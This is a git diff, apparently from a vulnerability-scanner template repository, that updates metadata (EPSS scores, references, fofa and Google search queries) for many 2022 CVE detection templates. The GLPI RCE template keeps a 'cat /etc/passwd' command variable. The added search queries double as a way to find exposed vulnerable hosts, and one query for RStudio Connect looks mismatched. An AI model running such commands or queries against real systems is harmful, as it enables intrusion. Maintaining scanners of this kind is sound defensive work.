- epss-score: 0.00237 - epss-percentile: 0.61804 + epss-score: 0.00148 + epss-percentile: 0.50728 cpe: cpe:2.3:a:yuba:u5cms:8.3.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-32770.yaml b/http/cves/2022/CVE-2022-32770.yaml index 8a03aa579d..2847a4d4a3 100644 --- a/http/cves/2022/CVE-2022-32770.yaml +++ b/http/cves/2022/CVE-2022-32770.yaml @@ -14,13 +14,15 @@ info: - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538 - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql - https://nvd.nist.gov/vuln/detail/CVE-2022-32770 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-32770 cwe-id: CWE-79 - epss-score: 0.00103 - epss-percentile: 0.41592 + epss-score: 0.00136 + epss-percentile: 0.49015 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +30,7 @@ info: vendor: wwbn product: avideo shodan-query: http.html:"AVideo" + fofa-query: body="avideo" tags: cve2022,cve,avideo,xss,wwbn http: diff --git a/http/cves/2022/CVE-2022-32771.yaml b/http/cves/2022/CVE-2022-32771.yaml index 99d9a0c458..e80317e13e 100644 --- a/http/cves/2022/CVE-2022-32771.yaml +++ b/http/cves/2022/CVE-2022-32771.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-32771 cwe-id: CWE-79 epss-score: 0.00074 - epss-percentile: 0.30395 + epss-percentile: 0.31793 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: wwbn product: avideo shodan-query: http.html:"AVideo" + fofa-query: body="avideo" tags: cve,cve2022,avideo,xss,wwbn http: diff --git a/http/cves/2022/CVE-2022-32772.yaml b/http/cves/2022/CVE-2022-32772.yaml index 77d222d80a..17f96e5611 100644 --- a/http/cves/2022/CVE-2022-32772.yaml +++ b/http/cves/2022/CVE-2022-32772.yaml @@ -14,13 +14,15 @@ info: - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538 - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql - https://nvd.nist.gov/vuln/detail/CVE-2022-32772 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-32772 cwe-id: CWE-79 - epss-score: 0.00056 - epss-percentile: 0.21026 + epss-score: 0.00074 + epss-percentile: 0.31793 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +30,7 @@ info: vendor: wwbn product: avideo shodan-query: http.html:"AVideo" + fofa-query: body="avideo" tags: cve2022,cve,avideo,xss,wwbn http: diff --git a/http/cves/2022/CVE-2022-33119.yaml b/http/cves/2022/CVE-2022-33119.yaml index c147ddcde0..1c6019d9ed 100644 --- a/http/cves/2022/CVE-2022-33119.yaml +++ b/http/cves/2022/CVE-2022-33119.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-33119 cwe-id: CWE-79 - epss-score: 0.0157 - epss-percentile: 0.86981 + epss-score: 0.00314 + epss-percentile: 0.70155 cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: nuuo product: nvrsolo_firmware shodan-query: http.html:"NVRsolo" + fofa-query: body="nvrsolo" tags: cve,cve2022,nvrsolo,xss,nuuo http: diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml index 6bd02c9441..575a68ce83 100644 --- a/http/cves/2022/CVE-2022-33174.yaml +++ b/http/cves/2022/CVE-2022-33174.yaml @@ -30,6 +30,7 @@ info: vendor: powertekpdus product: basic_pdu_firmware shodan-query: http.html:"Powertek" + fofa-query: body="powertek" tags: cve2022,cve,powertek,auth-bypass,powertekpdus http: diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index f24ba6dee7..86cc26f3f5 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-33891 cwe-id: CWE-78 - epss-score: 0.97289 - epss-percentile: 0.99851 + epss-score: 0.97208 + epss-percentile: 0.99827 cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: apache product: spark shodan-query: title:"Spark Master at" + fofa-query: body="/apps/imt/html/" + google-query: intitle:"spark master at" tags: cve2022,cve,apache,spark,kev,packetstorm variables: command: "echo CVE-2022-33891 | rev" diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml index 2294352f6f..0e4fd8bcb3 100644 --- a/http/cves/2022/CVE-2022-33901.yaml +++ b/http/cves/2022/CVE-2022-33901.yaml @@ -21,7 +21,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-33901 epss-score: 0.00779 - epss-percentile: 0.80981 + epss-percentile: 0.81349 cpe: cpe:2.3:a:multisafepay:multisafepay_plugin_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index a7b0e3bfcc..08d0ce7a43 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-33965 cwe-id: CWE-89 - epss-score: 0.01233 - epss-percentile: 0.83986 + epss-score: 0.01516 + epss-percentile: 0.86982 cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -31,6 +31,8 @@ info: product: wp_visitor_statistics framework: wordpress google-query: inurl:"/wp-content/plugins/wp-stats-manager" + fofa-query: body="wp-stats-manager" + shodan-query: http.html:"wp-stats-manager" tags: cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market http: diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml index c894429126..2efff32f32 100644 --- a/http/cves/2022/CVE-2022-34045.yaml +++ b/http/cves/2022/CVE-2022-34045.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-34045 cwe-id: CWE-798 epss-score: 0.05662 - epss-percentile: 0.93156 + epss-percentile: 0.93312 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: wavlink product: wl-wn530hg4_firmware shodan-query: http.html:"WN530HG4" + fofa-query: body="wn530hg4" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,exposure http: diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml index b1060a2f78..7de45889d4 100644 --- a/http/cves/2022/CVE-2022-34046.yaml +++ b/http/cves/2022/CVE-2022-34046.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-34046 cwe-id: CWE-863 epss-score: 0.14292 - epss-percentile: 0.95577 + epss-percentile: 0.95713 cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: wavlink product: wn533a8_firmware shodan-query: http.title:"Wi-Fi APP Login" + fofa-query: title="wi-fi app login" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,packetstorm,wavlink,router,exposure http: diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml index 954b71dae4..471a1e56b4 100644 --- a/http/cves/2022/CVE-2022-34047.yaml +++ b/http/cves/2022/CVE-2022-34047.yaml @@ -30,6 +30,8 @@ info: vendor: wavlink product: wl-wn530hg4_firmware shodan-query: http.title:"Wi-Fi APP Login" + fofa-query: body="wn530hg4" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,router,exposure,packetstorm http: diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml index cd377ce7c0..21de1b1035 100644 --- a/http/cves/2022/CVE-2022-34048.yaml +++ b/http/cves/2022/CVE-2022-34048.yaml @@ -30,6 +30,8 @@ info: vendor: wavlink product: wn533a8_firmware shodan-query: http.html:"Wavlink" + fofa-query: title="wi-fi app login" + google-query: intitle:"wi-fi app login" tags: cve2022,cve,wavlink,xss,router,edb http: diff --git a/http/cves/2022/CVE-2022-34049.yaml b/http/cves/2022/CVE-2022-34049.yaml index c9d91f7d05..d132165ace 100644 --- a/http/cves/2022/CVE-2022-34049.yaml +++ b/http/cves/2022/CVE-2022-34049.yaml @@ -30,6 +30,8 @@ info: vendor: wavlink product: wl-wn530hg4_firmware shodan-query: http.title:"Wi-Fi APP Login" + fofa-query: body="wn530hg4" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,router,exposure http: diff --git a/http/cves/2022/CVE-2022-34093.yaml b/http/cves/2022/CVE-2022-34093.yaml index d7d192cc8f..bd71b9e337 100644 --- a/http/cves/2022/CVE-2022-34093.yaml +++ b/http/cves/2022/CVE-2022-34093.yaml @@ -17,14 +17,16 @@ info: cvss-score: 6.1 cve-id: CVE-2022-34093 cwe-id: CWE-79 - epss-score: 0.00266 - epss-percentile: 0.65533 + epss-score: 0.00258 + epss-percentile: 0.65535 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: softwarepublico product: i3geo + shodan-query: http.html:"i3geo" + fofa-query: body="i3geo" tags: cve,cve2022,i3geo,xss,softwarepublico http: diff --git a/http/cves/2022/CVE-2022-34094.yaml b/http/cves/2022/CVE-2022-34094.yaml index 41df93a9f5..26d84ff584 100644 --- a/http/cves/2022/CVE-2022-34094.yaml +++ b/http/cves/2022/CVE-2022-34094.yaml @@ -17,14 +17,16 @@ info: cvss-score: 6.1 cve-id: CVE-2022-34094 cwe-id: CWE-79 - epss-score: 0.00266 - epss-percentile: 0.65533 + epss-score: 0.00258 + epss-percentile: 0.65535 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: softwarepublico product: i3geo + shodan-query: http.html:"i3geo" + fofa-query: body="i3geo" tags: cve2022,cve,i3geo,xss,softwarepublico http: diff --git a/http/cves/2022/CVE-2022-34121.yaml b/http/cves/2022/CVE-2022-34121.yaml index 6c023aa399..6a6add0649 100644 --- a/http/cves/2022/CVE-2022-34121.yaml +++ b/http/cves/2022/CVE-2022-34121.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-34121 cwe-id: CWE-829 - epss-score: 0.66943 - epss-percentile: 0.97855 + epss-score: 0.69358 + epss-percentile: 0.97998 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34328.yaml b/http/cves/2022/CVE-2022-34328.yaml index 0cb67471d4..e90c595780 100644 --- a/http/cves/2022/CVE-2022-34328.yaml +++ b/http/cves/2022/CVE-2022-34328.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-34328 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36967 + epss-percentile: 0.37623 cpe: cpe:2.3:a:sigb:pmb:7.3.10:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: sigb product: pmb shodan-query: http.html:"PMB Group" + fofa-query: body="pmb group" tags: cve,cve2022,pmb,xss,pmb_project http: diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml index 77c1005781..ad06d8b20c 100644 --- a/http/cves/2022/CVE-2022-34576.yaml +++ b/http/cves/2022/CVE-2022-34576.yaml @@ -21,7 +21,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-34576 epss-score: 0.03075 - epss-percentile: 0.90796 + epss-percentile: 0.91011 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: wavlink product: wn535g3_firmware shodan-query: http.html:"Wavlink" + fofa-query: title="wi-fi app login" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,exposure http: diff --git a/http/cves/2022/CVE-2022-34590.yaml b/http/cves/2022/CVE-2022-34590.yaml index 7ff5fdfdac..0d7981b750 100644 --- a/http/cves/2022/CVE-2022-34590.yaml +++ b/http/cves/2022/CVE-2022-34590.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-34590 cwe-id: CWE-89 - epss-score: 0.01429 - epss-percentile: 0.86269 + epss-score: 0.01426 + epss-percentile: 0.86518 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: hospital_management_system_project product: hospital_management_system shodan-query: http.html:"Hospital Management System" + fofa-query: body="hospital management system" tags: cve,cve2022,hms,cms,sqli,hospital_management_system_project http: diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml index 1124ffaca8..d623bf0f7b 100644 --- a/http/cves/2022/CVE-2022-34753.yaml +++ b/http/cves/2022/CVE-2022-34753.yaml @@ -29,6 +29,7 @@ info: vendor: schneider-electric product: spacelogic_c-bus_home_controller_firmware shodan-query: html:"SpaceLogic C-Bus" + fofa-query: body="spacelogic c-bus" tags: cve2022,cve,iot,spacelogic,rce,oast,packetstorm,schneider-electric http: diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml index 04519a5b18..d0a786ab3d 100644 --- a/http/cves/2022/CVE-2022-35151.yaml +++ b/http/cves/2022/CVE-2022-35151.yaml @@ -30,6 +30,7 @@ info: vendor: keking product: kkfileview shodan-query: http.html:"kkFileView" + fofa-query: body="kkfileview" tags: cve,cve2022,xss,kkfileview,keking http: diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index b93c5d5cd7..a2ca9e2c53 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -29,6 +29,8 @@ info: vendor: zohocorp product: manageengine_access_manager_plus shodan-query: http.title:"ManageEngine" + fofa-query: title="manageengine" + google-query: intitle:"manageengine" tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf,kev,zohocorp http: diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml index 6dd5baad96..990cc6514d 100644 --- a/http/cves/2022/CVE-2022-35413.yaml +++ b/http/cves/2022/CVE-2022-35413.yaml @@ -30,6 +30,8 @@ info: vendor: pentasecurity product: wapples shodan-query: http.title:"Intelligent WAPPLES" + fofa-query: title="intelligent wapples" + google-query: intitle:"intelligent wapples" tags: cve,cve2022,wapples,firewall,default-login,pentasecurity http: diff --git a/http/cves/2022/CVE-2022-35416.yaml b/http/cves/2022/CVE-2022-35416.yaml index 0db605cff6..692efb5b87 100644 --- a/http/cves/2022/CVE-2022-35416.yaml +++ b/http/cves/2022/CVE-2022-35416.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35416 cwe-id: CWE-79 - epss-score: 0.00088 - epss-percentile: 0.36353 + epss-score: 0.00102 + epss-percentile: 0.41641 cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35493.yaml b/http/cves/2022/CVE-2022-35493.yaml index 592dc3e926..d2afd30ad4 100644 --- a/http/cves/2022/CVE-2022-35493.yaml +++ b/http/cves/2022/CVE-2022-35493.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35493 cwe-id: CWE-79 - epss-score: 0.00157 - epss-percentile: 0.52174 + epss-score: 0.00118 + epss-percentile: 0.45934 cpe: cpe:2.3:a:wrteam:eshop_-_ecommerce_\/_store_website:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: wrteam product: eshop_-_ecommerce_\/_store_website shodan-query: http.html:"eShop - Multipurpose Ecommerce" + fofa-query: body="eshop - multipurpose ecommerce" tags: cve,cve2022,eshop,xss,wrteam http: diff --git a/http/cves/2022/CVE-2022-35653.yaml b/http/cves/2022/CVE-2022-35653.yaml index 022fbc4de6..5637fd770c 100644 --- a/http/cves/2022/CVE-2022-35653.yaml +++ b/http/cves/2022/CVE-2022-35653.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35653 cwe-id: CWE-79 - epss-score: 0.00921 - epss-percentile: 0.82544 + epss-score: 0.01147 + epss-percentile: 0.84758 cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: moodle product: moodle shodan-query: title:"Moodle" + fofa-query: title="moodle" + google-query: intitle:"moodle" tags: cve,cve2022,moodle,xss http: diff --git a/http/cves/2022/CVE-2022-3578.yaml b/http/cves/2022/CVE-2022-3578.yaml index f235f695f9..ed663ceefd 100644 --- a/http/cves/2022/CVE-2022-3578.yaml +++ b/http/cves/2022/CVE-2022-3578.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-3578 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45981 + epss-score: 0.00122 + epss-percentile: 0.46518 cpe: cpe:2.3:a:metagauss:profilegrid:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index 706f623aa0..e7b76c15b0 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml @@ -30,6 +30,8 @@ info: vendor: glpi-project product: glpi shodan-query: http.favicon.hash:"-1474875778" + fofa-query: icon_hash="-1474875778" + google-query: intitle:"glpi" tags: cve,cve2022,glpi,rce,kev,glpi-project variables: cmd: "cat+/etc/passwd" diff --git a/http/cves/2022/CVE-2022-36446.yaml b/http/cves/2022/CVE-2022-36446.yaml index 2e554033b9..038cde1a2b 100644 --- a/http/cves/2022/CVE-2022-36446.yaml +++ b/http/cves/2022/CVE-2022-36446.yaml @@ -29,6 +29,8 @@ info: vendor: webmin product: webmin shodan-query: title:"Webmin" + fofa-query: title="webmin" + google-query: intitle:"webmin" tags: cve,cve2022,packetstorm,webmin,rce,authenticated,edb http: diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml index 95d822f1fc..ee5bcbd447 100644 --- a/http/cves/2022/CVE-2022-36537.yaml +++ b/http/cves/2022/CVE-2022-36537.yaml @@ -30,6 +30,8 @@ info: vendor: zkoss product: zk_framework shodan-query: http.title:"Server backup manager" + fofa-query: title="server backup manager" + google-query: intitle:"server backup manager" tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss http: diff --git a/http/cves/2022/CVE-2022-36553.yaml b/http/cves/2022/CVE-2022-36553.yaml index 02820f6e49..48df8a1532 100644 --- a/http/cves/2022/CVE-2022-36553.yaml +++ b/http/cves/2022/CVE-2022-36553.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-36553 cwe-id: CWE-77 - epss-score: 0.46383 - epss-percentile: 0.9713 + epss-score: 0.56895 + epss-percentile: 0.97694 cpe: cpe:2.3:o:hytec:hwl-2511-ss_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml index 3e07bba2f3..0ead5380fd 100644 --- a/http/cves/2022/CVE-2022-36642.yaml +++ b/http/cves/2022/CVE-2022-36642.yaml @@ -29,6 +29,8 @@ info: vendor: telosalliance product: omnia_mpx_node_firmware shodan-query: http.title:"Omnia MPX Node | Login" + fofa-query: title="omnia mpx node | login" + google-query: intitle:"omnia mpx node | login" tags: cve,cve2022,traversal,omnia,edb,lfi,telosalliance http: diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml index 6200beeadd..47cefc2342 100644 --- a/http/cves/2022/CVE-2022-36804.yaml +++ b/http/cves/2022/CVE-2022-36804.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-36804 cwe-id: CWE-77 - epss-score: 0.97343 - epss-percentile: 0.99886 + epss-score: 0.9735 + epss-percentile: 0.99894 cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-37153.yaml b/http/cves/2022/CVE-2022-37153.yaml index b22c9cf9a6..252a79d46f 100644 --- a/http/cves/2022/CVE-2022-37153.yaml +++ b/http/cves/2022/CVE-2022-37153.yaml @@ -28,6 +28,7 @@ info: vendor: articatech product: artica_proxy shodan-query: http.html:"Artica" + fofa-query: body="artica" tags: cve,cve2022,xss,artica,articatech http: diff --git a/http/cves/2022/CVE-2022-37190.yaml b/http/cves/2022/CVE-2022-37190.yaml index 2676a9c412..dd4d1fcfa6 100644 --- a/http/cves/2022/CVE-2022-37190.yaml +++ b/http/cves/2022/CVE-2022-37190.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-37190 cwe-id: CWE-732 - epss-score: 0.02018 - epss-percentile: 0.8771 + epss-score: 0.19055 + epss-percentile: 0.9625 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-37299.yaml b/http/cves/2022/CVE-2022-37299.yaml index 09f3c6f08e..cf8c6b4dbf 100644 --- a/http/cves/2022/CVE-2022-37299.yaml +++ b/http/cves/2022/CVE-2022-37299.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2022-37299 cwe-id: CWE-22 - epss-score: 0.00772 - epss-percentile: 0.80878 + epss-score: 0.00663 + epss-percentile: 0.79609 cpe: cpe:2.3:a:shirne_cms_project:shirne_cms:1.2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml index 38ea791bf2..54adc8e270 100644 --- a/http/cves/2022/CVE-2022-3768.yaml +++ b/http/cves/2022/CVE-2022-3768.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-3768 cwe-id: CWE-89 - epss-score: 0.01715 - epss-percentile: 0.86512 + epss-score: 0.02196 + epss-percentile: 0.89419 cpe: cpe:2.3:a:wpsmartcontracts:wpsmartcontracts:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38131.yaml b/http/cves/2022/CVE-2022-38131.yaml index c7bf808a41..75f4a12690 100644 --- a/http/cves/2022/CVE-2022-38131.yaml +++ b/http/cves/2022/CVE-2022-38131.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-38131 cwe-id: CWE-601 - epss-score: 0.0006 - epss-percentile: 0.23591 + epss-score: 0.001 + epss-percentile: 0.41301 cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: product: connect shodan-query: "http.favicon.hash:217119619" fofa-query: "app=\"RStudio-Connect\"" + google-query: intitle:"openvpn connect" tags: tenable,cve,cve2022,redirect,rstudio http: diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml index 910d6cdbc6..83dd277a75 100644 --- a/http/cves/2022/CVE-2022-38463.yaml +++ b/http/cves/2022/CVE-2022-38463.yaml @@ -30,6 +30,8 @@ info: vendor: servicenow product: servicenow shodan-query: http.title:"ServiceNow" + fofa-query: title="servicenow" + google-query: intitle:"servicenow" tags: cve,cve2022,servicenow,xss http: diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml index faef6326e0..70954f8e2c 100644 --- a/http/cves/2022/CVE-2022-38553.yaml +++ b/http/cves/2022/CVE-2022-38553.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-38553 cwe-id: CWE-79 - epss-score: 0.00218 - epss-percentile: 0.5972 + epss-score: 0.00212 + epss-percentile: 0.5922 cpe: cpe:2.3:a:creativeitem:academy_learning_management_system:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: creativeitem product: academy_learning_management_system google-query: intext:"Study any topic, anytime" + shodan-query: http.html:"study any topic, anytime" + fofa-query: body="study any topic, anytime" tags: cve2022,cve,academylms,xss,creativeitem http: diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml index e66c68ee6d..53d563fb1d 100644 --- a/http/cves/2022/CVE-2022-38637.yaml +++ b/http/cves/2022/CVE-2022-38637.yaml @@ -30,6 +30,7 @@ info: vendor: hospital_management_system_project product: hospital_management_system shodan-query: http.html:"Hospital Management System" + fofa-query: body="hospital management system" tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project http: diff --git a/http/cves/2022/CVE-2022-38794.yaml b/http/cves/2022/CVE-2022-38794.yaml index 2975a09d86..6b1238c9e3 100644 --- a/http/cves/2022/CVE-2022-38794.yaml +++ b/http/cves/2022/CVE-2022-38794.yaml @@ -13,13 +13,16 @@ info: reference: - https://github.com/zyearn/zaver/issues/22 - https://nvd.nist.gov/vuln/detail/CVE-2022-38794 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-38794 cwe-id: CWE-22 - epss-score: 0.00536 - epss-percentile: 0.7469 + epss-score: 0.00913 + epss-percentile: 0.82805 cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-38817.yaml b/http/cves/2022/CVE-2022-38817.yaml index 8ab0162bf2..5953bb409d 100644 --- a/http/cves/2022/CVE-2022-38817.yaml +++ b/http/cves/2022/CVE-2022-38817.yaml @@ -15,19 +15,22 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38817 - https://github.com/dapr/dashboard - https://nvd.nist.gov/vuln/detail/CVE-2022-38817 + - https://github.com/Miraitowa70/POC-Notes classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-38817 cwe-id: CWE-306 - epss-score: 0.01019 - epss-percentile: 0.82099 + epss-score: 0.0132 + epss-percentile: 0.8595 cpe: cpe:2.3:a:linuxfoundation:dapr_dashboard:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: linuxfoundation product: dapr_dashboard shodan-query: http.title:"Dapr Dashboard" + fofa-query: title="dapr dashboard" + google-query: intitle:"dapr dashboard" tags: cve,cve2022,dapr,dashboard,unauth,linuxfoundation http: diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml index c3317573fc..3b0ea2c9ea 100644 --- a/http/cves/2022/CVE-2022-38870.yaml +++ b/http/cves/2022/CVE-2022-38870.yaml @@ -21,14 +21,16 @@ info: cvss-score: 7.5 cve-id: CVE-2022-38870 cwe-id: CWE-306 - epss-score: 0.01064 - epss-percentile: 0.83839 + epss-score: 0.01531 + epss-percentile: 0.8705 cpe: cpe:2.3:a:free5gc:free5gc:3.2.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: free5gc product: free5gc shodan-query: http.title:"free5GC Web Console" + fofa-query: title="free5gc web console" + google-query: intitle:"free5gc web console" tags: cve,cve2022,free5gc,exposure http: diff --git a/http/cves/2022/CVE-2022-39048.yaml b/http/cves/2022/CVE-2022-39048.yaml index 09b8437870..b626b3b4e7 100644 --- a/http/cves/2022/CVE-2022-39048.yaml +++ b/http/cves/2022/CVE-2022-39048.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-39048 cwe-id: CWE-79 - epss-score: 0.01306 - epss-percentile: 0.8443 + epss-score: 0.02684 + epss-percentile: 0.9044 cpe: cpe:2.3:a:servicenow:servicenow:quebec:-:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: servicenow product: servicenow shodan-query: http.title:"ServiceNow" + fofa-query: title="servicenow" + google-query: intitle:"servicenow" tags: cve,cve2022,xss,servicenow,authenticated http: diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml index 17f9d4d0d6..f2ae4ce67f 100644 --- a/http/cves/2022/CVE-2022-39195.yaml +++ b/http/cves/2022/CVE-2022-39195.yaml @@ -22,7 +22,7 @@ 